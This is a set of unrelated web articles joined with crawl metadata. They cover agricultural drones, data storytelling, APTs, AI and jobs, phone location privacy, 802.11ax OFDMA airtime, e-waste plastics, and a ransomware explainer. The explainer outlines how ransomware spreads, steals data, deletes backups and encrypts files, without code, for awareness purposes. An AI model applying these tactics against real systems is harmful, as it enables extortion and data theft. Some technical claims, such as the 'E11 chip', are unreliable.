The Bureau of Meteorology and CSIRO, in a December State of the Climate report forecast a decrease in rainfall across southern Australia with more time in drought, with an increase in intense heavy rainfall throughout Australia.
The agencies predict further increases in sea and air temperatures, with more hot days and marine heatwaves, and fewer cool extremes – all of which put greater pressure on water availability.
“If the soil is too dry, crops can fail due to a lack of water. But if the soil is too wet, crops can not only fail but pests and diseases can flourish,” Walker said.
“At best, farmers might have a single soil moisture sensor in a paddock, but this doesn’t allow for the optimal application of water, especially as this resource becomes scarcer. Plus it won’t take into account moisture variation levels across the individual paddocks,” he said.
The researchers say the technique could allow farmers to be more precise in their use of water, improve irrigation practices and maximise crop harvest.
“Farmers also need to cooperate; water conservation and efficiency is a collective responsibility. Everyone needs to do their part to use water more effectively or we’re at risk of running out completely,” Walker said.
“As the world’s driest continent facing climate change, a growing population and a greater demand for food, water conservation should be one of Australia’s top priorities,” he added.
The global market for drones in agriculture is estimated to reach US $2.9 billion by 2021, according to Zion Market Research.
There uses are wide-ranging. Equipped with hyperspectral sensors they can measure water and nitrogen levels far more efficiently than labour-intensive ground surveys. They can also be used to dust-crops, survey fences, and for livestock mustering instead of expensive helicopters.
|
<urn:uuid:51443382-0f72-49d0-97cb-844590a7b21e>
|
CC-MAIN-2022-40
|
https://www.cio.com/article/201707/drones-and-microwaves-promise-water-savings-for-farmers.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00457.warc.gz
|
en
| 0.939655 | 733 | 3.625 | 4 |
Be it in the form of fables that teach good morals or mythological tales that underpin the major world religions, stories have been a proven medium for teaching, explaining, and influencing. Combining these benefits of stories with the factuality of quantitative data to drive decision-making is what data-driven storytelling is all about.
The effectiveness of stories in getting a point across stems from a psychological phenomenon called neural coupling. It is an event where, while listening to a story, the neural activation patterns of the listeners mirror those of the storytellers.
What this implies is that the listener becomes more receptive, trusting, and empathetic to the storyteller since both their brains are synchronized. And when infused with facts and data, stories or narratives can be a highly potent tool to bring about organizational change and shape business outcomes.
So, what is data storytelling?
Put simply, data storytelling is a communication technique that involves weaving stories or narratives around data to ensure that the insights from it are well received, retained, and acted upon. It involves the following three components:
Data storytelling requires you to have up-to-date and accurate data. Data reporting platforms automatically pull vast amounts of data from multiple sources and save a lot of time in data collection and cleaning. Once the collected data is cleaned, it is processed and analyzed using algorithms to derive statistics and actionable insights.
The goal of visualizations is to uncover trends and convey them in a comprehensible way. The insights extracted from data are graphically represented using charts, graphs and other visual elements to convey the information. These visualizations help in discovering underlying trends and patterns in complex datasets that may have otherwise been missed while using a spreadsheet. The trends and insights are then communicated in an easy-to-decipher manner to help businesses to come to conclusions quickly.
The final and most important element of data storytelling is narrative. Using a narrative to support the visualization and insights can help in presenting them in a simple language. Business users and analysts can use these narratives to highlight significant trends, changes, KPIs and metrics, and accelerate their decision-making process.
Why should businesses adopt data storytelling?
Today, businesses across industries are collecting more data than ever from various sources like social media, research firms, and their own processes in the form of analytics reports and logs. All this data can be used to analyze existing trends and make informed decisions.
However, most businesses are unable to make the most of their data. That’s because business leaders who are not data-savvy may have a hard time making sense of this data even after it is cleaned, sorted, and visualized by data analysts.
They are unable to interpret the data by considering the context, and thus cannot gain any actionable insights for decision-making. Hence, even if an organization’s data scientists perform incredibly astute data analyses, they cannot drive organizational change.
By adopting data storytelling and the power of language, business leaders are able to understand where their organization has been, where it is, and where it is heading in the form of fluid, easy-to-understand narratives. By reading or listening to data-driven stories, business leaders can easily grasp the most remarkable highlights from their data and can also gain clarity in terms of future steps to be taken.
And since stories have greater influential power than just data alone, data-driven storytelling can actually transform the way an organization functions and lead to improved business outcomes. It adds purpose and meaning to insights and makes it easy for businesses to process complex business information. Marrying data analytics with storytelling makes visualizations more engaging and impactful, helps in keeping the audience engaged, and leaves a lasting impact on them.
How can businesses facilitate data-driven storytelling?
In order to implement and benefit from data storytelling, businesses can do either of the following two things:
- They can invest in training their data analysts to be good storytellers. It may take some time, but eventually, they can have analysts capable of providing insights through easy-to-consume narratives. Or,
- Businesses can use natural language generation technology to automate report writing and turn their analytics reports into stories written in an engaging tone. These stories can build a convincing and impactful narrative around analytics data to tell business leaders what's happening in their organization, making the analysts’ job easier.
Get AI-generated Data Stories with Phrazor
Phrazor uses augmented analytics and natural language generation to create unique AI-generated e-commerce stories from data. It takes in the data, analyzes it to draw insights and presents them in the form of engaging stories with the help of narratives, all without human intervention. With Phrazor’s data stories, business users can make data-driven decisions at the speed of thought. All you need to do is upload your dataset and set the required parameters, and you can have multiple automated data stories compiled in a report, in just a few clicks.
Here’s what a data story generated by Phrazor looks like:
This is a monthly sales and customer analysis report for e-commerce companies that uses relevant analytics and visual dashboards written in natural language summaries to provide data-driven insights. Using this report, executives or sales and marketing managers of large organizations and SMEs can get insights from monthly e-commerce retail sales and customer analysis.
Businesses across the globe have adopted data storytelling to improve business reporting and decision-making processes. Regardless of the means used by businesses to implement it, data-driven storytelling can undoubtedly help them make the most of their data. By combining the objectivity of data with the fascination of stories, Phrazor creates compelling data stories from complex datasets in real-time and helps businesses in accelerating their journey towards becoming more data-driven, and hence more efficient and effective.
To try Phrazor for your business, get in touch with us.
|
<urn:uuid:d010d1d6-014c-40ec-a0b2-f23ce6166033>
|
CC-MAIN-2022-40
|
https://phrazor.ai/blog/the-art-of-data-driven-storytelling-what-is-it-and-why-does-it-matter
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00457.warc.gz
|
en
| 0.934874 | 1,229 | 3.125 | 3 |
Advanced Persistent Threat
Advanced Persistent Threat (APT) is a general term used to describe tenacious, hidden, sophisticated cybersecurity threats against high-value targets.
APTs utilize different attack methods and systems that try to exploit known or zero-day vulnerabilities. Activities include the use of malware, network intrusion, and social engineering for a multi-layered approach. These assaults' motive is generally to install malicious software on one or more device and to have it remain undetected for a long period to surveil the target system.
APT attacks are often used for state-sponsored corporate espionage or espionage toward another government target. Motives also include the theft of intellectual property (IP) or aggregation of sensitive information on high-level persons inside the target organization. Following the extraction of such information, extortion or other use of the information to compromise personnel may follow. APTs also can be used more directly to harm and disrupt the communications and operations of the target.
APT costs in terms of expertise, manpower, computing power, and hardware resources are considerable and therefore the perpetrators are likely to be rogue governments seeking a new theater of conflict.
"The conviction of the apprehended foreign hackers responsible for last year's attack proves our suspicion that their country of origin is a hotbed of Advanced Persistent Threats, maybe even government-sponsored ones."
|
<urn:uuid:ef4e4a48-ed35-49d4-8976-4013291f41e8>
|
CC-MAIN-2022-40
|
https://www.hypr.com/security-encyclopedia/advanced-persistent-threat
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00457.warc.gz
|
en
| 0.918803 | 275 | 2.609375 | 3 |
I’ve been thinking a lot recently about the many ways in which artificial intelligence may change our lives.
copyright by www.forbes.com
One of the biggest impacts may be on jobs, not only on the nature of work itself, but on the availability of work. Some crystal ball gazers are predicting that AI (working in concert with its older sibling, automation) will trigger massive job losses ; others see AI producing a net gain in employment . Both views can be supported both logically and empirically; but they both can’t be right.
As Andy Kessler put it in a June 17 Wall Street Journal column, “The future happens, just not the way most people think.” Kessler then walked readers through a shopping list of past predictions that turned out to be way off the mark: “megamistakes,” he called them. One group of AI prognosticators is heading in that direction; we just don’t know which one.
So what do we know about AI? We know that AI algorithms—which are intended to trigger various responses by workers or machines—are created by humans, and are therefore subject to human error, bias, and a host of other potential flaws the techies would rather not talk about. AI is no more infallible than you or I.
Predictions about AI are therefore equally suspect. We don’t know what we don’t know.
What we do know, however, with some degree of certainty, is that AI’s smart technologies likely will impact the labor market, as all new labor-substitution technologies do, affecting some occupations more than others. The Brookings Institution suggests that the occupations most at risk include those involved in food preparation and food service, production operations, office and administrative support, farming, fishing and forestry, transportation and material moving, and construction and mining.
Frontier Economics , in a September 2018 analysis prepared for the Royal Society and British Academy, points more generically to “jobs typically performed by workers with relatively low levels of formal education” as most at risk.
A BCG team led by Andrea Gallego, Matt Krentz, Miki Tsusaka and Frances Brooks Taplett, in another recent report, “How AI Could Help—or Hinder—Women in the Workforce”, suggests the occupations most at risk are those stereotypically held by women: bank tellers, clerical and administrative positions, teachers. Brookings, on the other hand, suggests that jobs typically performed by men, truck driving and working on factory assembly lines, for example, are slightly more at risk.
Don’t let the jumble of conflicting analyses and opinions confuse you. The important point—whether you’re looking at the BCG report, the Brookings study, or the Royal Society/British Academy analysis—is that millions of today’s jobs, thanks to AI and other technologies, won’t exist in the future, or won’t exist as we know them today.[…]
|
<urn:uuid:a40883da-e560-4968-ae46-07799f9529cf>
|
CC-MAIN-2022-40
|
https://swisscognitive.ch/2019/07/10/artificial-intelligence-work-and-jobs-preparing-for-ais-uncertain-future/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00457.warc.gz
|
en
| 0.949491 | 630 | 2.875 | 3 |
Right to Privacy Can Police Obtain Smartphone Location Data Without a Warrant?
Today the Supreme Court Justices heard arguments in a major right to privacy court case, Carpenter vs. USA. The case challenges an interpretation of the law that allows crime investigators to obtain a suspect’s smartphone location data, including a location history, from wireless service providers without a warrant. police must obtain warrants to get data on the past locations of criminal suspects using cellphone data from wireless providers. Attorneys for Carpenter argue that the lack of a search warrant is a violation of the Fourth Amendment.
Timothy Carpenter was arrested in 2011 and convicted for a series of armed robberies of electronic stores in Ohio and the Detroit, Michigan area. Prosecutors used cell phone site location from Carpenter’s cell phone providers as part of their evidence. The location data, obtained with a search warrant, showed the defendant was near the crime scenes.
Mr. Carpenter’s American Civil Liberties Union lawyers maintain that this violates Carpenter’s right to privacy and was unreasonable search and seizure under the Fourth Amendment.
How does mobile phone tracking work?
It is possible to track the position of a mobile phone or other cellular connected electronic device by its position relative to nearby antennas. The Global System for Mobile Communications (GSM) uses the E11 chip that cannot be disabled to determine a device’s signal strength to triangulate proximity to nearby cell towers to determine location. Cellular phone service providers like Verizon and AT&T and internet companies like Google can track a device’s location at all times.
In addition, the metadata stored with a smartphone’s photos can determine where a phone was and when. Although this court case does not involve the images that were on the device itself.
The standard for accessing location data from electronic devices stems from the 1986 Stored Communications Act. This was last amended in 1994. Technology and the accuracy of location pinpointing have both evolved since then. The U.S. Constitution’s Fourth Amendment was, obviously, drafted in the 18th century. Requesting cell phone location data records does not require a warrant. However, it does require a court order. A court order is much easier to obtain than a search warrant.
A Supreme Court ruling on this digital right to privacy issue is expected in June 2018.
|
<urn:uuid:9f0b6a7a-e9d4-4a6b-80a8-2a288bce092b>
|
CC-MAIN-2022-40
|
https://www.askcybersecurity.com/right-privacy-can-police-obtain-smartphone-location-data-without-warrant/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00457.warc.gz
|
en
| 0.93475 | 472 | 2.796875 | 3 |
Scientists at NTU Singapore-CEA Alliance for Research in Circular Economy (SCARCE) repurposed the e-waste plastics, subjecting them only to sterilization, before being trialed in lab experiments. The team found that over 95 percent of the human stem cells seeded on plastics scavenged from discarded computer components remained healthy after a week, a result comparable to cells grown on conventional cell culture plates. Plastics found in electronic waste (e-waste) are rarely recycled due to their complex composition and hazardous additives, but scientists at Nanyang Technological University, Singapore (NTU Singapore) have developed a new use for them -- by repurposing them as an alternative to the plastics used in laboratory cell culture containers, such as Petri dishes.
Plastics found in electronic waste (e-waste) are rarely recycled due to their complex composition and hazardous additives, but scientists at Nanyang Technological University, Singapore (NTU Singapore) have developed a new use for them -- by repurposing them as an alternative to the plastics used in laboratory cell culture containers, such as Petri dishes. These findings, described in a study published online in the scientific journal Science of the Total Environment, indicate a potential new sustainable use for e-waste plastics, which account for about 20 percent of the 50 million tonnes of e-waste produced worldwide each year.
The new findings build on a 2020 study led by the same NTU team, which investigated the effect of e-waste plastics on six different human cell types and found healthy cell growth despite the hazardous elements to be found in e-waste plastics. These findings inspired the research team to upcycle e-waste plastic scraps and trial them in advanced cell culture applications.
Professor Dalton Tay of the NTU School of Materials Science and Engineering and School of Biological Sciences, who led this interdisciplinary study, said: "E-waste plastics contain hazardous components which may get released into the environment if not disposed of properly. Interestingly, we found through our studies that certain e-waste plastics could successfully maintain cell growth, making them potential alternatives to the cell culture plastics used in labs today."
"Repurposing them for immediate use rather than recycling them enables the immediate extension of the lifespan of e-waste plastics and minimizes environmental pollution. Our approach is in line with the zero-waste hierarchy framework, which prioritizes the reuse option through materials science and engineering innovation."
The NTU team used plastic scavenged from e-waste collected by a local waste recycling facility. Three kinds of e-waste plastic were chosen for their varied surface features -- the keyboard pushbuttons and diffuser sheet obtained from LCDs have a relatively flat and smooth surface, while the prism sheet, also found in LCDs, has highly aligned ridges. To test the viability of using e-waste plastics for cell cultures, the NTU team seeded stem cells onto 1.1cm-wide circular discs of sterilized e-waste plastics. A week later, the scientists found that more than 95 percent of live and healthy stem cells seeded on the e-plastics remained -- a result comparable to the experimental control of stem cells grown on commercially available cell culture plates made of polystyrene.
Prof Tay said: "In tissue engineering, we use advanced techniques to engineer surfaces and study how they can influence stem cell differentiation. Now, we have shown that e-waste plastics is a ready source of such microstructures that allow us to further study how stem cell development can be directed -- the 'holy grail' of regenerative medicine and more recently, lab-grown meat. There are important biomaterials and scaffold design rules and lessons we can learn from these e-waste plastic scraps."
To promote sustainable practices in research and innovative waste-to-resource solutions for the industry, say the scientists. The research is supported by Singapore's National Research Foundation and the National Environment Agency, under the Closing the Waste Loop Funding Initiative.
|
<urn:uuid:c7bf7206-604e-4715-945b-1fc3c50fea98>
|
CC-MAIN-2022-40
|
https://industryoutreachmagazine.com/scientists-reveal-upcycling-method-which-gives-new-lease-of-life-to-e-waste-plastics/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00457.warc.gz
|
en
| 0.931342 | 823 | 3.390625 | 3 |
The 802.11ax amendment was built to increase the efficiency of WiFi. One of the new features is OFDMA or the capability to send data to several stations simultaneously, multi-user operations.
One of the benefits of OFDMA is to decrease the duration it takes to send the data to several stations in relation to single-user operations. Especially for smaller frame sizes, but for which?
In this blog, I will check the trade-off between SU and MU operations in 802.11ax for three typical scenarios.
You will be amazed, I was
TXOP durations, SU and MU
Let us pretend the AP receives data from the infrastructure that shall be sent till two wireless clients, the same data to both. Because of contention on the wireless channel, the data is temporarily stored in the APs buffer. When the channel became free, the AP will send the data.
In this blog, I will try to find out where either MU or SU operations will use the least amount of duration to send the data to those two clients.
If we look at the TXOP durations for this it will look like this:
The first diagram shows the duration of the transmission using single-user HE frame format for the data frame. The AP needs to send two TXOPs for transferring the data to both clients.
The second diagram shows the same data sent to both clients using multi-user OFDMA operations. This time the AP sends the data to both clients simultaneously in one TXOP.
Common for both operations is that the TXOPs are using AIFS[BE], CW=8, and mcs7 for the data field. Each TXOP in figure 1 sends one symbol of data
If you look closer at the difference in the duration of each part of the TXOP you will see a difference in the HE preamble and the Block Acknowledgement (B-Ack). I explains this later,
The SU TXOP
Let’s look at the SU TXOP. Another view is like this:
When the AP decides to send the data to the clients with SU operation it will send the data frame with HE SU frame format and the BlockAck back from the clients is sent with legacy 802.11a frame format. The details of the HE SU frame format are slightly described in figure 2.
The duration for each part of TXOP can be found in the WiFiAirTimeCalculator
Without any further explanation, the duration for two TXOPs are:
t (2xTXOPsu) = 2*(43 + 72 + 20 + 22,2 + time of data field + 16 + 44) [microsecond], or
2 * (217,2 + duration of the data field).
Remark: BlockAck is sent at 12mb/s.
In figure 1 there is one symbol of data in each TXOP. One symbol is 14,4 microseconds including medium guard interval (1,6), so the shortest amount of time for sending two TXOPs with SU operation is approx 460 microseconds.
It can and will vary slightly depending of the number of spatial streams and other factors
The DL MU TXOP
An 802.11ax downlink multi-user TXOP looks like this:
When the AP decides to send data to the clients with MU operations it will use the HE MU frame format. With this frame format, it will subdivide the channel into resource units and send the data to the clients in parallel. The information on how the channel is subdivided is in the HE preamble, in the HE-SIG-B subfield. This is the reason why the HE preamble has a longer duration during MU operation.
The other key difference in relation to SU operations is that each receiving client/station will send its BlockAcknowledgement (BA) uplink to the AP within the HE Trigger-based frame format. Because this frame format is HE frame format it needs the same HE preamble as other HE frame formats. That is why the transmission of BA in HE takes a longer time than a BA in legacy frame format, but now we send severals of BA simultaneously
A typical DL MU OFDMA TXOP (without RTD/CTS) seen in Wireshark looks like this:
- The first line in figure 4 is the Basic Trigger sub A-MPDU where the AP inform the client on how it shall send its BlockAck
- 11 sub A-MPDU data frames
- The last line is the BlockAck from the client, in a HE trigger-based frame format
Remark: the capturing device is configured to capture traffic for the this specific client/station
The total duration t(mu) = duration of AIFSN[BE] + duration of CW (random backoff timer ) + duration of legacy preamble + duration of HE MU preamble + duration of MU data field + SIFS + duration of legacy preamble + duration of HE trigger-based preamble + duration of the data field for the BA
The last part (SIFS + Multi-STA BA) can be manually calculated, but I will use data from figure 4. The easiest place to look is into the Duration/NAV of the preceding data frame. In this blog, I use the NAV of 130 microseconds
Or in the UL Length of the Basic Trigger frame in the DL data frame. For this, you need to do some calculations.
That is: UL Length *4/3 + SIFS + legacy preamble, or (70 * 4/3 + 16 + 20 = 129,3)
With this setup, two clients and mcs0 for the HE-SIG-B, the HE-SIG-B need three symbols.
Without any more discussions and explaination the duration of a DL MU TXOP are:
t(mu) = 43 + 72 + 20 + 33,2 + time of data field + 130 (microsecond).
t(mu) = 298.2 + duration of the DL data field
Different use of subcarriers in HE SU and MU operations
The use of subcarriers is different between SU and MU operations. On a 20MHz channel, the transmitter will use the full channel during single-user operations. This is 242 subcarriers, where 234 are used for data transfer and the remaining 8 are guard subcarriers.
During multi-user operations and subdividing the channel for two clients the AP uses 106 subcarriers to each client, where 102 of those transfer data and 4 as guard subcarriers. And there is a center 26-tone resource unit (26 subcarriers) not used.
Comparing SU and MU operations
In figure 1 we saw that the duration for sending 2 TXOPs in single-user operations took 460 microseconds
And the same data sent in 1 TXOPs with multi-user operations took 312 microseconds
Both methods send one symbol of data
Because single-user operations use more of the spectrum (more data subcarriers) than multi-user operations, the duration of the MU TXOPs will increase faster than the duration of the single-user TXOPs when the data payload increases.
Why: SU used 234 data subcarriers on a 20MHz channel. When the same 20MHz channel is subdivided into two times 106 tones RU, only 102 subcarriers are used for each client. 102 in relation to 234 is 44%.
Therefore will the duration for those operations be more equal for bigger payloads and at some point be equal
We will look at three scenarios. Common for all of them is that the data is sent with MCS7, AIFS[BE], and a CW of 8. The SU BlockAck is sent with 12mb/s. The duration for the MU BlockAck is picked from a capture.
There is no protection (RTS/CTS) used. The result would have been slightly different, especially when using the MU-RTS frame during MU operations. But not too much.
In the following figures, the payload in bytes is on the x-axis and the duration in microseconds is on the y-axis.
All three start with the duration of 312 microseconds for the MU TXOP and 460 microsecond for the two SU TXOPs. The circle is approx where those two lines cross each other
Scenario 1 is with 20MHz, 1 spatial stream
Scenario 2 is with 20 MHz and 2 spatial streams
Scenario 3 is with 80 MHz and 2 spatial streams which will be a very common scenario in WiFi6E, WiFi in the 6 GHz band.
As we can see, the AP has to send rather big frame sizes before the duration for the MU TXOPs will go over the durations for the two SU TXOPs
At 20 MHz and 1 spatial stream the breaking point is approx 5000 bytes (5 kB)
At 20 MHz and 2 spatial streams the breaking point is approx 10000 bytes (10 kB)
At 80 MHz and 2 spatial streams the breaking point is approx 120.000 bytes (120 kB)
In this blog, I have compared the time duration between sending data from an AP till two clients by using HE (802.11ax) single-user and multi-user operations. For small frame sizes, the multi-user operation has the shortest duration. Depending of whether the data is sent over 20 or 80 MHz or 1 or 2 spatial streams the breaking point where single-user operation duration will be shorter than multi-user operation will vary.
For me, it was surprising how big payloads the AP needs to send before single user operation will be more efficient than multi-user operations.
But this is only one scenario out of an endless amount of scenarios. This scenario was with the same amount of data sent till two clients on the same mcs and AIFS[n]
I hope this is useful for you. It was for me
|
<urn:uuid:0c370bed-4815-4ae3-805e-173b3f694035>
|
CC-MAIN-2022-40
|
https://gjermundraaen.com/2022/04/15/802-11ax-to-ofdma-or-not-to-ofdma/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00457.warc.gz
|
en
| 0.900505 | 2,088 | 2.578125 | 3 |
Speed Subnetting, Part 2
Click here for Part 1 of this series.
WARNING: You must master subnetting using our course or some other trusted materials before you start using these shortcut approaches. It is a common issue for Cisco candidates to move directly to subnetting shortcuts for the exams without fully understanding exactly how subnetting functions.
Question 2: You have run the ipconfig command and discovered your IP address and mask are 192.168.20.102 and 255.255.255.224. How many hosts are permitted on your subnet?
Step 1: I reference the Powers of Two chart I created on my scratch paper when I encountered the first question. Adding 128 + 64 + 32 = 224. There are 3 bits used for subnetting and that leaves 5 bits for hosts.
2^7=128 | 2^6=64 | 2^5=32 | 2^4=16 | 2^3=8 | 2^2-=4 | 2 ^1=2 | 2^0=1
Step 2: The equation for the number of hosts per subnet is 2^h - 2 where h is the number of host bits. From the chart I see that 2^5 = 32. 32-2 = 30 hosts per subnet! Too easy!
As always, let us know in the comments if you have a quicker approach.
|
<urn:uuid:9c76b6c4-7529-4cde-b187-66bc62e968d2>
|
CC-MAIN-2022-40
|
https://ine.com/blog/2010-10-14-speed-subnetting-part-2
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00457.warc.gz
|
en
| 0.879893 | 294 | 3.140625 | 3 |
Ransomware Explained. What It Is and How It Works
This post is also available in: German
Every day, cybersecurity specialists detect over 200,000 new ransomware strains. This means that each minute brings no less than 140 strains capable of avoiding detection and inflicting irreparable damage. But what is ransomware in the end? Briefly, ransomware is one of the most common and most dangerous cyber threats of today, with damaging consequences for individuals and businesses alike.
In this article, I will explain what ransomware is, how it works, how to prevent it, and what to do if attacked. Besides, recent statistics and ransomware examples will show you real facts to make you understand how ransomware attacks really happen.
What Is Ransomware?
Ransomware is a type of malware that blocks users from accessing their operating system or files until a ransom is paid. It does so by locking the system’s screen or encrypting the users’ files.
The victims receive a ransom note informing them that they must pay a certain amount of money (usually in Cryptocurrencies) to regain access to their system or data. There is generally a time restriction for completing the payment, else the files may be lost permanently or made public by attackers. It should be reminded that even if the victim pays the ransom, there is no assurance that the decryption key will be delivered.
How Does Ransomware Work?
Every ransomware has different behavior. There are 2 types of ransomware: locker ransomware and encrypting ransomware. The first locks the victim out of the operating system making it impossible to access the desktop and any apps or files and the latter is the most common which incorporates advanced encryption algorithms and it’s designed to block system files.
However, the result is always the same. Locking files or systems and demanding a ransom for their recovery. Here are some common steps on how ransomware works:
1. Ransomware Delivery and Deployment
Cybercriminals simply look for the easiest way to infect a system or network and use that backdoor to spread the malicious content. Nevertheless, these are the most common infection methods used by cybercriminals:
- Phishing email campaigns that contain malicious links or attachments (there are plenty of forms that malware can use for disguise on the web);
- Security exploits in vulnerable software;
- Internet traffic redirects to malicious websites;
- Legitimate websites that have malicious code injected into their web pages;
- Drive-by downloads;
- Malvertising campaigns;
- SMS messages (when targeting mobile devices);
- vulnerable Remote Desktop Protocol exploitation.
2. Lateral Movement
After the initial access, ransomware spreads via lateral movement tactics to all devices in your network and tries to get full access. If no micro-segmentation or network segmentation is put in place, the ransomware will move laterally on the network, this meaning that the threat spreads to other endpoints and servers in the entire IT environment, therefore engaging in self-propagation. This way, hackers can use detection evasion techniques to build persistent ransomware attacks.
3. Attack Execution
If in the past ransomware used tactics like weak symmetric encryption, now ransomware operators leverage more advanced methods like data exfiltration. Basically, hackers can exfiltrate sensitive business data before making the encryption leading to double extortion: this way, cybercriminals can threaten organizations to make their private information public if the ransom is not paid. Keeping data hostage is no longer the only method.
Ransomware will look for backups in order to destroy them before encrypting data. This type of malware can recognize backups by file extension and documents stored in the cloud could be at risk too. Offline backup storage or read-only features on backup files might prevent backups recognition and deletion.
Ransomware is practically the combination of cryptography with malware. Ransomware operators use asymmetric encryption, a.k.a. public-key cryptography, a process that employs a set of keys (one public key and one private key) to encrypt and decrypt a file and protect it from unauthorized access or use. The keys are uniquely generated for the victim and only made available after the ransom is paid.
It is almost impossible to decrypt the files that are being held for ransom without access to a private key. However, certain types of ransomware can be decrypted using specific ransomware decryptors.
After encryption, a warning pops up on the screen with instructions on how to pay for the decryption key. Everything happens in just a few seconds, so victims are completely dumbstruck as they stare at the ransom note in disbelief.
The appearance of Bitcoin and the evolution of encryption algorithms helped turn ransomware from a minor threat used in cyber vandalism, to a full-fledged money-making machine. Usually, threat actors request payment in Bitcoins because this cryptocurrency cannot be tracked by cybersecurity researchers or law enforcement agencies.
Top Targets for Ransomware
Cybercriminals soon realized that companies and organizations were far more profitable than users, so they went after the bigger targets: police departments, city councils, and even schools and hospitals. If the percentage of businesses that paid the ransom raised to 26% in 2020 and has increased to 32% in 2021, the $170,404 is the average value of the ransom paid this year. But for now, let’s find out what are the top targets for ransomware.
Public institutions, such as government agencies, manage huge databases of personal and confidential information that cybercriminals can sell, making them favorites among ransomware operators. Because the staff is not trained to spot and avoid cyberattacks and public institutions often use outdated software and equipment, means that their computer systems are packed with security holes just begging to be exploited.
Unfortunately, a successful infection has a big impact on conducting usual activities, causing huge disruptions. Under such circumstances, ransomware victims experience financial damage either by owning up to large ransomware payouts or by bearing the price of recovering from these attacks.
In short, because that’s where the money is. Threat actors know that a successful infection can cause major business disruptions, which will increase their chances of getting paid. Since computer systems in companies are often complex and prone to vulnerabilities, they can easily be exploited through technical means. Additionally, the human factor is still a huge liability that can also be exploited through social engineering tactics. It is worth mentioning that ransomware can affect not only computers but also servers and cloud-based file-sharing systems, going deep into a business’s core.
Cybercriminals know that businesses would rather not report an infection for fear of legal consequences and brand damage.
Since they usually don’t have data backups, home users are the number one target for ransomware operators. They have little or no cybersecurity education at all, which means they’ll click on almost anything, making them prone to manipulation by cyber attackers. They also fail to invest in need-to-have cybersecurity solutions and don’t keep their software up to date (even if specialists always nag them to). Lastly, due to the sheer volume of Internet users that can become potential victims, more infected PCs mean more money for ransomware gangs.
By now you know that there’s plenty of versions out there. With names such as CryptXXX, Troldesh, or Chimera, these strains sound like the stuff hacker movies are made of. So while newcomers may want to get a share of the cash, a handful of families have established their domination.
Conti ransomware has become famous after targeting healthcare institutions. Its usual methods leverage phishing attacks to achieve remote access to a machine and further spread laterally onto the network, meanwhile performing credentials theft and unencrypted data gathering.
A famous attack was that on Ireland’s Health Service Executive (HSE) on the 14th of May 2021 when the gang requested $20 million not to release the exfiltrated data.
DarkSide is a ransomware program that operates as a ransomware-as-a-service (RaaS) group. It began attacking organizations worldwide in August 2020 and, like other similar threats utilized in targeted cyberattacks, DarkSide not only encrypts the victim’s data but also exfiltrates it from the impacted servers.
In just 9 months of operations, at least $90 million in Bitcoin ransom payments were made to DarkSide, coming from 47 different wallets. The ransomware gang gained around $10 million from that profit attacking chemical distribution organization Brenntag, which paid a $4.4 million ransom, and Colonial Pipeline, which also paid $5 million in cryptocurrency.
It’s a good example of ransomware that uses double extortion as hackers normally ask for a ransom to return the data they exfiltrated, so the paying pressure is higher.
REvil Ransomware aka Sodinokibi first spotted in April 2019 and working as a ransomware-as-a-service model, is famous for its attacks on JBS in June 2021 and Kaseya in July 2021.
Due to a Kaseya software vulnerability to SQL injection attacks, REvil Ransomware managed to encrypt Kaeya’s servers. This resulted in a supply chain attack as its customers were infected.
JBS, the biggest meatpacking enterprise worldwide, was hit by REvil on May 30, 2021, and had to pay an $11 million ransom to prevent hackers from leaking their data online.
Avaddon Ransomware was distributed via phishing emails with malicious JAVA script files and is famous for its attack on the French enterprise AXA in May 2021. Its operators use normally data leak websites to publish there the information of the victims who do not pay the ransom.
As its name says, QLocker ransomware operates as a locker, compromising users’ storage devices. Therefore victims are locked out until they provide the password. Its targets are QNAP devices. The files in these network-attached storage devices are encrypted in a 7-zip archive format that requires a password.
Ryuk is a ransomware-as-a-service (RaaS) group that’s been active since August 2018. It is widely known for running a private affiliate program in which affiliates can submit applications and resumes to apply for membership. In the last months of 2020, the gang’s affiliates were attacking approximately 20 companies every week, and, starting November 2020, they coordinated a massive wave of attacks on the US healthcare system.
Even if this is not recent, of course, we cannot skip mentioning this famous one. On Friday, May 12, 2017, around 11 AM ET/3 PM GMT, a ransomware attack of “unprecedented level” (Europol) started spreading WannaCry around the world. It used a vulnerability in Windows that allowed it to infect victims’ PC’s without them taking any action. Until May 24, 2017, the infection has affected over 200,000 victims in 150 countries.
From 1989’s first ransomware distributed via floppy disks and with a ransom price of $189 to today’s million dollars ransom, here are some statistics that will help you further understand the threat of ransomware.
- The first half of 2021 recorded a doubling in ransomware attacks compared to 2020.
- Data exfiltration and data leakage were common practices that allowed double extortion.
- Conti, Avaddon, and REvil are the authors of 60% of the attacks.
- The U.S. registered 54.9 % of the victims, being a top target for ransomware attacks.
Top Ransomware Targets by Industry
According to SonicWall’s 2021 Cyber Threat Report, there have been far more hits on government customers than any other industry. By June, government customers “were getting hit with roughly 10 times more ransomware attempts than average”.
During the first half of 2021, the education field saw even more ransomware attempts than the government sector. In March, the FBI’s Cyber Division has issued a flash alert to warn of an increase in ransomware attacks targeting government entities, educational institutions, private companies, and the healthcare sector. A month later, the Conti ransomware gang encrypted the systems at Broward County Public Schools, threatening to release sensitive personal data of students and staff unless the district paid an enormous $40 million ransom.
Healthcare organizations are the new favorite targets of ransomware attacks. Hospitals have become perennial targets of cyberattacks, including UC San Diego Health, Scripps Health, SalusCare, New Hampshire Hospital, and Atascadero State Hospital. As previously stated, healthcare providers lose an average of 7% of their customers after a data breach or ransomware attack, which is the highest when compared to other industries.
